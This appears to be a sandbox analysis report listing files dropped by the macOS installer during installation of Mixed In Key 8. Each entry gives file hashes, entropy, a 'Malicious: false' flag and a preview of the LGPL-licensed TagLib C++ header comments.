/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_HFKsDm Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	C++ source, ASCII text
Category:	dropped
Size (bytes):	6288
Entropy (8bit):	4.454831999769721
Encrypted:	false
SSDEEP:	192:wMIxJAUtntam2c6cM8zuO/Ab2iG8uzNmBaOIQbXK/GqV+8EzE:wMgsuHh/n+8
MD5:	E3604E9DA33E3E88BE9EC7C0447F2A92
SHA1:	667067EBE1F19628A0B94E23B23183F8E010772B
SHA-256:	3A7F2179133CBAC189CFF1F91BEC375B2D4AAA62CEAA7C54C4550F13F63F0A78
SHA-512:	8E5D6EE7D4A7227A74100BAF6694FDE0C32A82B194E58F17725FAF420376006EB96D347EF4D064E41702BB63CDF13E7EA1595B62818A4B8A320D7AAE00CB315C
Malicious:	false
Preview:	/*************************************************************************. copyright : (C) 2002 - 2008 by Scott Wheeler. email : wheeler@kde.org. copyright : (C) 2006 by Urs Fleisch. email : ufleisch@users.sourceforge.net. ***********************************************************************/../************************************************************************. This library is free software; you can redistribute it and/or modify . it under the terms of the GNU Lesser General Public License version . 2.1 as published by the Free Software Foundation. . . This library is distributed in the hope that it will be useful, but . WITHOUT ANY WARRANTY; without even the implied warranty of . MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU . Lesser Gene

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_HQ6nxO Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	C++ source, ASCII text
Category:	dropped
Size (bytes):	7084
Entropy (8bit):	4.389516451879127
Encrypted:	false
SSDEEP:	192:La4mAr3yQltMWPGav8wQ0aQ1QQpdQfRQhBQe7QGlQJuQcYQ+mQUKknQ6YQggQckZ:LaLALJPOWN8u8jrPoQdkQUE6XLs
MD5:	2A2E00B9E15D1A44BE4A8DD6B2217296
SHA1:	59026D09A8A637F190CBE7D6F1648CC20013C46B
SHA-256:	0CE90EB473E6850F93D336D6E9B5F584A0CAAE77DE87EA53D9F3E01632A7FC94
SHA-512:	C3AF03741A035703BEC19097278BDD0B76ABD7848EE6AC8B4FFCCCCCE365B6EAC8BF566E24C7F74927EF06A245B380F1601A771719B03863BEA861ECFB01E1C7
Malicious:	false
Preview:	/*************************************************************************. copyright : (C) 2002 - 2008 by Scott Wheeler. email : wheeler@kde.org. ***********************************************************************/../************************************************************************. This library is free software; you can redistribute it and/or modify . it under the terms of the GNU Lesser General Public License version . 2.1 as published by the Free Software Foundation. . . This library is distributed in the hope that it will be useful, but . WITHOUT ANY WARRANTY; without even the implied warranty of . MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU . Lesser General Public License for more details. .

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_HZxkvd Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	C++ source, UTF-8 Unicode text
Category:	dropped
Size (bytes):	3113
Entropy (8bit):	4.312991656744381
Encrypted:	false
SSDEEP:	48:x3TyBHbKjPOLNijwj0tw/F0tp/YG5ZLJug56FbVFA1G:xCbNOw9OpTNG
MD5:	2AFB0D1F6D6A6DC02F3858724568E10B
SHA1:	3466B855F4C0272E622E5E2C059C261AF5011BD4
SHA-256:	EC0A540787EB2E33A9454F14D8E76A50A5EBB5BDC60B234B8B786034FD0E02C4
SHA-512:	397B79C5D0FE3950E5EC6CED7522F7E99624C1238C938FD15E94A367D74BCAB70E9024FDAFB4492E9BADF95AC8D36E9A9D2080300642051ECCAC4067B49D641F
Malicious:	false
Preview:	/************************************************************************. copyright : (C) 2007 by Luk.. Lalinsk.. email : lalinsky@gmail.com. **********************************************************************/../************************************************************************. This library is free software; you can redistribute it and/or modify . it under the terms of the GNU Lesser General Public License version . 2.1 as published by the Free Software Foundation. . . This library is distributed in the hope that it will be useful, but . WITHOUT ANY WARRANTY; without even the implied warranty of . MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU . Lesser General Public License for more details. .

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_HlHTM9 Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	C++ source, ASCII text
Category:	dropped
Size (bytes):	6225
Entropy (8bit):	4.312701111887273
Encrypted:	false
SSDEEP:	192:DMIa6s8XwEFHd1I8N+OeKMQAa1m6X+BlFz2wzJ:DMyrlO3
MD5:	968162F46BEBC3DDAD08EA2A2F75E21B
SHA1:	C470750B3F43EAEE7BC35B3B7BF056385F76DEB7
SHA-256:	950B66B9F8A4FBF9EF462A2F0D6B4669E3D2B20AA22628C0E96E6D43F0927E3A
SHA-512:	20A35F84D81E87DE1B0D2AFFA8B6C52C3BAE14953AA6C64D804BE22C50262960E8B337277D7D5235851F51B69BBC1CDA299F4AE925D88D50DBC48D18766B3B9C
Malicious:	false
Preview:	/*************************************************************************. copyright : (C) 2014 by Urs Fleisch. email : ufleisch@users.sourceforge.net. ***********************************************************************/../************************************************************************. This library is free software; you can redistribute it and/or modify . it under the terms of the GNU Lesser General Public License version . 2.1 as published by the Free Software Foundation. . . This library is distributed in the hope that it will be useful, but . WITHOUT ANY WARRANTY; without even the implied warranty of . MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU . Lesser General Public License for more details. .

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_IABGhg Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	C++ source, ASCII text
Category:	dropped
Size (bytes):	4474
Entropy (8bit):	4.345208088452255
Encrypted:	false
SSDEEP:	96:kobapUoWggv5WlxhOlUQGGQUKjgG2TLcNTQJlQA+QQBHudgwX:LepIgK5WlbOyQGGQU8gvTgNTQJlQA+Q1
MD5:	4F568A7E8AA213C07851C8FFC56F5E40
SHA1:	D9BD5BD9B68A1B910112F1404B79FCFD1DA4C592
SHA-256:	2D715BF14B3E286E857918813BCC5DEF75D9770B11AFE7AAF95B2DED480A0C92
SHA-512:	D7132D9B4F7FCAA75273A4CB049BAD652BF6BB88EC00672B4B0BA5458CAF3CEF05771E84BB8C2149B3F0DDEA8800419EE27F73922E9EFB66BB28F1CC779675E0
Malicious:	false
Preview:	/*************************************************************************. copyright : (C) 2002 - 2008 by Scott Wheeler. email : wheeler@kde.org. ***********************************************************************/../************************************************************************. This library is free software; you can redistribute it and/or modify . it under the terms of the GNU Lesser General Public License version . 2.1 as published by the Free Software Foundation. . . This library is distributed in the hope that it will be useful, but . WITHOUT ANY WARRANTY; without even the implied warranty of . MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU . Lesser General Public License for more details. .

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_IXkFDW Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	C++ source, ASCII text
Category:	dropped
Size (bytes):	7624
Entropy (8bit):	4.298019813088321
Encrypted:	false
SSDEEP:	192:Ld7C1mBpSp7+c18a3A/ih6N4xl4YNqgsxtgYST35h0Ls5zV4fU54fE+EOJ3kjVJZ:LNK/crM2RuVYmH
MD5:	7087CAC8FB619E4CCD57D9A7CF1467A9
SHA1:	64B5F18FC65834B58B4B762EB79F8E08F05784FC
SHA-256:	3411B98207390A85E7D2CF183C539BBE96598D56B4ECFBF8412A9257784D47A6
SHA-512:	4525824263DC9BC240AF46C94A7F7572866573F225706A45BD59AB57888BBFE35A4F95D496A884FD0FA5E231B3C0839C7CB72952ADEE334C73E2CE95B3933AC0
Malicious:	false
Preview:	/*************************************************************************. copyright : (C) 2002 - 2008 by Scott Wheeler. email : wheeler@kde.org. ***********************************************************************/../************************************************************************. This library is free software; you can redistribute it and/or modify . it under the terms of the GNU Lesser General Public License version . 2.1 as published by the Free Software Foundation. . . This library is distributed in the hope that it will be useful, but . WITHOUT ANY WARRANTY; without even the implied warranty of . MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU . Lesser General Public License for more details. .

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_J0aPtb Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	C++ source, UTF-8 Unicode text
Category:	dropped
Size (bytes):	2759
Entropy (8bit):	4.23311756659942
Encrypted:	false
SSDEEP:	24:8SWHjN57bfy9lOkHYg/TbVI2+RymPOFes3OjHpsnM+M8p7b/W3F6AhXr2cG:KnTyBHbKjPOLSeA1ndG
MD5:	A95BF5B4B235AA95D0C1FBB4738D2DF5
SHA1:	6B478AC0711E7582EEBA5B9C1799253D8B5D9E2D
SHA-256:	877934D36A162E4948C5D82120E8F75F52F26301E060BB3D93E9B37DE6D7A85A
SHA-512:	810DDECD3DB19060363547530DF4C57353AC82E984E1AA2E0E2B7896F834AF94ECFE2535D256AD553D12AD26FD72260526C100715104204690F5327A514891D8
Malicious:	false
Preview:	/*************************************************************************. copyright : (C) 2011 by Mathias Panzenb.ck. email : grosser.meister.morti@gmx.net. ***********************************************************************/../************************************************************************. This library is free software; you can redistribute it and/or modify . it under the terms of the GNU Lesser General Public License version . 2.1 as published by the Free Software Foundation. . . This library is distributed in the hope that it will be useful, but . WITHOUT ANY WARRANTY; without even the implied warranty of . MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU . Lesser General Public License for more details. .

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_JmSGeK Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	C++ source, ASCII text
Category:	dropped
Size (bytes):	11974
Entropy (8bit):	4.42043505852269
Encrypted:	false
SSDEEP:	192:z8hP8xEknyVab+YqSNgw4bJMlQbJXzIfL8MoWm//5bDmodnoObsI9V8+4VxQR51y:zMI8hJMcJjjLpbKoiOiE6
MD5:	513B91267A9CF75E665198281CC077EE
SHA1:	2D63BBF0DD90E8E71B0D54EDA398B92F527D1A09
SHA-256:	AA2B0278DBDF77DBBCA5B65D985D558C7E71C2B7FC7E133ED688F87FFF58EE48
SHA-512:	F84A6EB3A342780FAC5FEFAE51CBB50663BA564A56D90B141FC60D9222A1C3491F5907F1626606EF140C5E12333B78108793369FB5A004A339EC4F65BD6CF300
Malicious:	false
Preview:	/*************************************************************************. copyright : (C) 2003 by Allan Sandfeld Jensen. email : kde@carewolf.org. ***********************************************************************/../************************************************************************. This library is free software; you can redistribute it and/or modify . it under the terms of the GNU Lesser General Public License version . 2.1 as published by the Free Software Foundation. . . This library is distributed in the hope that it will be useful, but . WITHOUT ANY WARRANTY; without even the implied warranty of . MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU . Lesser General Public License for more details. .

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_K4K3Y3 Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	C++ source, ASCII text
Category:	dropped
Size (bytes):	2814
Entropy (8bit):	4.31428471845395
Encrypted:	false
SSDEEP:	48:ktTyBHbKjPOLdA/zd7/11koGa1Zg/difhNe/Z:kobtAbNd171ZgEfhNeh
MD5:	937F68EFFE0120038B2713D7280C7935
SHA1:	97AB599AA279B2957C9C9ECFD798DF592BA69E91
SHA-256:	A2753C3FEEDC4F8FB56C7978298C0EF0449149A38116CE82D5120BA30DF323D2
SHA-512:	55E9647F3680C23DB11EA06CABFF6B1F6C75C41B075EF0074B1C860493BD7D23EF53AD42E2BBD01CFF9EFD5166FA8E31CE2A149E955E7A90E398888BFE5E3750
Malicious:	false
Preview:	/*************************************************************************. copyright : (C) 2002 - 2008 by Scott Wheeler. email : wheeler@kde.org. ***********************************************************************/../************************************************************************. This library is free software; you can redistribute it and/or modify . it under the terms of the GNU Lesser General Public License version . 2.1 as published by the Free Software Foundation. . . This library is distributed in the hope that it will be useful, but . WITHOUT ANY WARRANTY; without even the implied warranty of . MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU . Lesser General Public License for more details. .

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_Km9RwW Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	C++ source, UTF-8 Unicode text
Category:	dropped
Size (bytes):	7087
Entropy (8bit):	4.337977863406877
Encrypted:	false
SSDEEP:	192:1I0/UAo+hJhPqJhjJqJktSmG2nt2jEAjEWKcujECjE6jEM4fPbJUObJwgc:1/QSaQluPjN8rJ/J8
MD5:	E87176EC3810137E9CFA7DBDE5D6A08C
SHA1:	6D459F52F1AAFDB48E1530D8D0044C21EA9952D7
SHA-256:	737D1404C0698D0C6C9802EB7091249E7CB516AAD060C35A4A9388BEBCD3DEBE
SHA-512:	0975CA73AAF7C09F818C0642D61F5A9CE83FAA854C7F0DDD3B714EF3651F5316B24DAA1241AB7414935984D92D88EDC72C50AA42F476337BAA42A087319C0E15
Malicious:	false
Preview:	/*************************************************************************. copyright : (C) 2011 by Mathias Panzenb.ck. email : grosser.meister.morti@gmx.net. ***********************************************************************/../************************************************************************. This library is free software; you can redistribute it and/or modify . it under the terms of the GNU Lesser General Public License version . 2.1 as published by the Free Software Foundation. . . This library is distributed in the hope that it will be useful, but . WITHOUT ANY WARRANTY; without even the implied warranty of . MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU . Lesser General Public License for more details. .

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_L6bBdc Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	C++ source, ASCII text
Category:	dropped
Size (bytes):	9082
Entropy (8bit):	4.351864931572195
Encrypted:	false
SSDEEP:	192:lu0fZgwnoeyd/2YARdE1N+9VJ5/0+J5HJ0oqyN5qCYUJ5YJ/pMJ5X2gMJ5+2/kNx:ldtBPi+9VJW+JdJ/OUJOJRMJxxMJg8d6
MD5:	5759BD74D4C22371B1E63D4FCE81D150
SHA1:	06E7496BAB1444E4937C3A19BC7375BAA048725D
SHA-256:	0EBE2D57AA10E71F7E85E4850F6C4566932B2ED212C518AD01C87D26B5B13957
SHA-512:	632FFE05CFF451776091B3A9755C2DDE272500932038ABA0BC251D31C226110A0E14125313AB2E316EC8E87EC556214668AC0E472980E22DD9759A4631E07E94
Malicious:	false
Preview:	/*************************************************************************. copyright : (C) 2013 by Lukas Krejci. email : krejclu6@fel.cvut.cz. ***********************************************************************/../************************************************************************. This library is free software; you can redistribute it and/or modify . it under the terms of the GNU Lesser General Public License version . 2.1 as published by the Free Software Foundation. . . This library is distributed in the hope that it will be useful, but . WITHOUT ANY WARRANTY; without even the implied warranty of . MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU . Lesser General Public License for more details. .

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_LId2G3 Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	C++ source, ASCII text
Category:	dropped
Size (bytes):	12558
Entropy (8bit):	4.623609197432942
Encrypted:	false
SSDEEP:	192:LFFhuirHRjNxBcNIjwcRUuccRNJRaKUGqbnzwVbvzqalb82IfSRFRIq5hCwb4aG2:L9RVRtRhSu6dQz
MD5:	51484F064A1661B43C6B50047C79E432
SHA1:	32F6F53E2BB2FD1C8991D61792FF2812741C3E52
SHA-256:	8A6674A7DF6D2A3E8D2221B5D5747CBB9FC3C85B37CA3FA78AAE8CEF3B3B4FCF
SHA-512:	57E8A04BFC969D0B65397CCD3DA0DBC5D7DC051632A6CF526A23CF7BB60940556E08988B794940DF7C1DF9A7DD0A76F6FA40FBCC0D458187F953539974DC6968
Malicious:	false
Preview:	/*************************************************************************. copyright : (C) 2002 - 2008 by Scott Wheeler. email : wheeler@kde.org. ***********************************************************************/../************************************************************************. This library is free software; you can redistribute it and/or modify . it under the terms of the GNU Lesser General Public License version . 2.1 as published by the Free Software Foundation. . . This library is distributed in the hope that it will be useful, but . WITHOUT ANY WARRANTY; without even the implied warranty of . MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU . Lesser General Public License for more details. .

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_LP1OeN Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	C++ source, ASCII text
Category:	dropped
Size (bytes):	3406
Entropy (8bit):	4.423663971658814
Encrypted:	false
SSDEEP:	48:ktTyBHbKjPOL1fRvfL+LtW/eqJ8qh17dMUVSXsKIWCXRYP03O:kob3nL+LkxJ8qh17dMUVSXsKIWCXK8O
MD5:	B5A4CC258F1C0C847B186CA5DB543A0F
SHA1:	BBF2C76B75D5B02A4A48B1D72EE9914D8464E65C
SHA-256:	3E2ADDA474795CE17A6BB087A48E30D050286D24E327EECA058A25F4E478F50A
SHA-512:	A450B2634D0FA6B439A96FF1EB68FD6F9E38AB262FBC44DC23C340FFE98BC9F3DC16FDB7798A003DD0E77FC76EC22C44845458EE1ADBA4A197AC2F656985F234
Malicious:	false
Preview:	/*************************************************************************. copyright : (C) 2002 - 2008 by Scott Wheeler. email : wheeler@kde.org. ***********************************************************************/../************************************************************************. This library is free software; you can redistribute it and/or modify . it under the terms of the GNU Lesser General Public License version . 2.1 as published by the Free Software Foundation. . . This library is distributed in the hope that it will be useful, but . WITHOUT ANY WARRANTY; without even the implied warranty of . MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU . Lesser General Public License for more details. .

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_MxU78s Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	C++ source, ASCII text
Category:	dropped
Size (bytes):	17007
Entropy (8bit):	4.528103666067434
Encrypted:	false
SSDEEP:	192:LzJGSRfczOazZyYxbjv/+YulVyr7uToB4BSeTbyNuTSTewyQWep/KVfJmtrj9Upa:LzkocJDJlPNU/NyY+uS
MD5:	1556132384018F3D0F03C0C8CA306C98
SHA1:	EE6EA17E3BD999B9D5794D37F53E9A6C78891E4E
SHA-256:	69410F5C764954592537AE2020334D7AD03E0AB41D8A66A2F2392D5A185E54F5
SHA-512:	9D1693BDA0D0E41AFABC8DB22D2B7640C16D29259CAB09E0F998A26EF4312D63E6189F1303B38CBBCBCB7B2E63DDA52D8309FD3A8A5F1880CB6A91E5EB663629
Malicious:	false
Preview:	/*************************************************************************. copyright : (C) 2002 - 2008 by Scott Wheeler. email : wheeler@kde.org. ***********************************************************************/../************************************************************************. This library is free software; you can redistribute it and/or modify . it under the terms of the GNU Lesser General Public License version . 2.1 as published by the Free Software Foundation. . . This library is distributed in the hope that it will be useful, but . WITHOUT ANY WARRANTY; without even the implied warranty of . MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU . Lesser General Public License for more details. .

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_NxXFYl Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	C++ source, ASCII text
Category:	dropped
Size (bytes):	7084
Entropy (8bit):	4.455538740266144
Encrypted:	false
SSDEEP:	192:LsT7XeziapHaNLk3sTnpzhsEfaQRV9+rMZF2d1L46be/:L6bFCyk3S776O
MD5:	00FD0878A55B1E1E9985AE65CFB782A9
SHA1:	74F1CB79213A0EE655BD827E77C90F54CDE2095D
SHA-256:	1ED2A1E1B6EA181F3CB86EB556D9C2755037A4C0DE43C8B3B47686106508384E
SHA-512:	A1C0F4123059B158FF593C32E43C3874BA2EA5C67CE505B59B5E37643386579E15B4D30C7E0C70E39F0C49D92BC01D7C40CA47F269CD523EFB1E7FA42EE74C82
Malicious:	false
Preview:	/*************************************************************************. copyright : (C) 2002 - 2008 by Scott Wheeler. email : wheeler@kde.org. ***********************************************************************/../************************************************************************. This library is free software; you can redistribute it and/or modify . it under the terms of the GNU Lesser General Public License version . 2.1 as published by the Free Software Foundation. . . This library is distributed in the hope that it will be useful, but . WITHOUT ANY WARRANTY; without even the implied warranty of . MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU . Lesser General Public License for more details. .

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_P4YWAS Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	C++ source, ASCII text
Category:	dropped
Size (bytes):	3904
Entropy (8bit):	4.252279263145623
Encrypted:	false
SSDEEP:	96:BybKvPKGBlVFZFLaZf6clMuF4601VvdDMaxiKmFXbzTes3rHhC:Q6PnDFzmNJaq4601xdDMaxiKmFrzQ
MD5:	3A6565839027572D57F6B91E66EF7534
SHA1:	E2A401D9B20B0D36544CF0374743606A31BE5426
SHA-256:	93CD35F0CE23A37FD14DEFC00976F41B8F2E35FE85F9D49EB48D6A6EFF29BFAA
SHA-512:	5BD946D2CD62E2CAC9D4AE8F1470AC05FAFF084213C6691F0627FF1808CFD89AD6292E6E3A327BD761467E04E0465B71C14B10C69100E20FF5BDC718CF3113D9
Malicious:	false
Preview:	/*************************************************************************. copyright : (C) 2008 by Lukas Lalinsky. email : lalinsky@gmail.com. ***********************************************************************/../************************************************************************. This library is free software; you can redistribute it and/or modify . it under the terms of the GNU Lesser General Public License version . 2.1 as published by the Free Software Foundation. . . This library is distributed in the hope that it will be useful, but . WITHOUT ANY WARRANTY; without even the implied warranty of . MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU . Lesser General Public License for more details. .

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_P6SAGZ Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	C++ source, UTF-8 Unicode text
Category:	dropped
Size (bytes):	4573
Entropy (8bit):	4.346952933513883
Encrypted:	false
SSDEEP:	96:fCbbPq5C0U6qsk0USvdsqSN4VLbJnOtGybJ4zCft8hG:K/Pq5ZVnqqSN4VLbJnOtGybJ4zCft88
MD5:	8410EC7584B549275FB6D82B17D8BD62
SHA1:	D00B889EEFB8DFC8B986A689251FCDB03DFDD90E
SHA-256:	EB8C582413D9A5A1DB5E40BED603E099EBED92BFF47AF0B2440AD3258B8D92E6
SHA-512:	0984B33F3FE4D29470A125933487C926826019071F70E9499C7AD32528697A356DB9149D1D3687DFF16AE35DD791E7A81DF8B31C8AA4A047EAA739396BA9CB3F
Malicious:	false
Preview:	/************************************************************************. copyright : (C) 2005-2007 by Luk.. Lalinsk.. email : lalinsky@gmail.com. **********************************************************************/../************************************************************************. This library is free software; you can redistribute it and/or modify . it under the terms of the GNU Lesser General Public License version . 2.1 as published by the Free Software Foundation. . . This library is distributed in the hope that it will be useful, but . WITHOUT ANY WARRANTY; without even the implied warranty of . MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU . Lesser General Public License for more details. .

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_PpUx4J Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	C++ source, UTF-8 Unicode text
Category:	dropped
Size (bytes):	4787
Entropy (8bit):	4.366628892669605
Encrypted:	false
SSDEEP:	96:xCb/HPkp80Roqo60SModoqSNuwGbJnOtGybJ4zLAtMOupGEG:QDHPkpOvsOqSNuwGbJnOtGybJ4zLAtMQ
MD5:	70A1B5C875F4685A3B8A093650C444EA
SHA1:	8448618C6E6A0B4960225640E2DE667FD49351B1
SHA-256:	30A921D282165DFC9E3BD3221D05A70D2522C0AE2082F2020E502C253B35A2A0
SHA-512:	892D5DD8399E4BD66F26DE597D88DE5FB3BBC029C508E72B03D499D0B7DDCD40E91389440CF6F1BE1A5A6921D1389A5BB2773D2F1147545DD7A9449B4C34919F
Malicious:	false
Preview:	/************************************************************************. copyright : (C) 2007 by Luk.. Lalinsk.. email : lalinsky@gmail.com. **********************************************************************/../************************************************************************. This library is free software; you can redistribute it and/or modify . it under the terms of the GNU Lesser General Public License version . 2.1 as published by the Free Software Foundation. . . This library is distributed in the hope that it will be useful, but . WITHOUT ANY WARRANTY; without even the implied warranty of . MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU . Lesser General Public License for more details. .

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_Q720nd Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	C++ source, ASCII text
Category:	dropped
Size (bytes):	10265
Entropy (8bit):	4.394600447993459
Encrypted:	false
SSDEEP:	192:L2ikkD+bidnjRe+AiVSKtdM5E1zGyQKqOg82mK+s0ZgS8Lnb3JafiJJNVaYH:L2ikcIjJJmU0e
MD5:	E2A0B995B271B54A662A8918BA80B695
SHA1:	8F5BF927C587D3AA7AA07AD23BF25A84E9EE4507
SHA-256:	79ABB2AE9B46B27183B735AD0590E7A9753EDA849CAD0AAB1C4E93C51D0B8167
SHA-512:	D74004001916D6DDEEC26D593E12DAB1A6EBE02535C1DB755277FEB3E59727DE52B303733F7F31183DF90F50A870757F01F55A79A53239914E29F77011267BB9
Malicious:	false
